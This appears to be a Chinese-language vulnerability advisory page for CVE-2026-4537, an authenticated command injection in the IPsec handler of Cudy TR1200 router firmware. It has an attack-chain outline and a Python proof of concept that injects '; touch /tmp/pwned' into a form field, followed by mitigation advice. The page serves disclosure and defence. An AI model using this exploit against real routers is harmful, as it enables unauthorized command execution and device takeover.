CVE-2026-4537 CVSS 4.7 中危

CVE-2026-4537 Cudy TR1200命令注入漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4537

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Cudy TR1200

漏洞概述

Cudy TR1200路由器固件R46-2.4.15版本中存在命令注入漏洞。该漏洞位于/usr/bin/lib/lua/luci/controller/ipsec.lua文件的action_ipsec_conn函数中。由于对用户输入处理不当，经过认证的高权限攻击者可远程发送特制恶意请求，在系统后台执行任意操作系统命令。目前该漏洞利用细节已公开，厂商已确认并修复。

技术细节

该漏洞根因在于Cudy TR1200 Web管理界面（基于LuCI）的IPsec连接处理逻辑中。具体来说，/usr/bin/lib/lua/luci/controller/ipsec.lua文件内的action_ipsec_conn函数在接收和处理IPsec连接配置参数时，未对用户提交的数据进行严格的边界检查或特殊字符过滤。攻击者利用高权限账号（PR:H）访问该接口后，可以在参数字段中注入Shell元字符（如分号;、管道符|或反引号`）。当后端脚本将这些参数传递给系统命令执行环境（如os.execute）时，注入的 payload 将被解析为独立的系统指令执行，从而导致远程命令执行（RCE）。

攻击链分析

STEP 1

信息收集

攻击者扫描网络并识别出目标设备为Cudy TR1200路由器，并确定其运行受影响的固件版本。

STEP 2

权限获取

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或默认凭据获取路由器Web管理界面的管理员账号密码。

STEP 3

漏洞利用

攻击者构造包含恶意Shell命令的HTTP POST请求，发送至ipsec.lua的action_ipsec_conn接口。

STEP 4

命令执行

后端脚本未过滤恶意字符，直接将参数传递给系统Shell执行，导致攻击者在设备上运行任意命令。

STEP 5

后门维持

攻击者利用执行权限修改系统配置、下载恶意软件或开启反向Shell，从而持久化控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-4537 (Command Injection in Cudy TR1200)
# Requires High Privileges (Admin Login)

import requests

# Target URL (adjust IP accordingly)
target_url = "http://192.168.1.1/cgi-bin/luci/admin/vpn/ipsec"

# Attacker's IP or command to verify execution
# Example: creating a file or pinging an external host
injected_command = "; touch /tmp/pwned"

# Login credentials (High Privileges required)
payload_data = {
    "cbi.submit": "Save",
    "action_ipsec_conn": "test_conn",
    # Injecting payload into a vulnerable field
    "local_addr": injected_command 
}

# Session cookie obtained after authentication
cookies = {
    "sysauth": "<admin_cookie_value>"
}

try:
    response = requests.post(target_url, data=payload_data, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check if the command was executed on the target.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Cudy TR1200 R46-2.4.15-20250721-164017

防御指南

临时缓解措施

若无法立即升级，建议暂时禁用路由器的远程管理功能，并在防火墙中阻止外部对IPsec管理接口的访问，仅允许受信任的内部IP地址进行管理操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4537
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4537
3 Details https://www.cvedetails.com/cve/CVE-2026-4537/
4 VulDB https://vuldb.com/cve/CVE-2026-4537
5 Link https://github.com/qazmn/my_cve/blob/main/cudy_cve/Cudy_TR1200_Command_Injection.md
6 Link https://vuldb.com/submit/774447
7 Link https://vuldb.com/vuln/352325
8 Link https://vuldb.com/vuln/352325/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表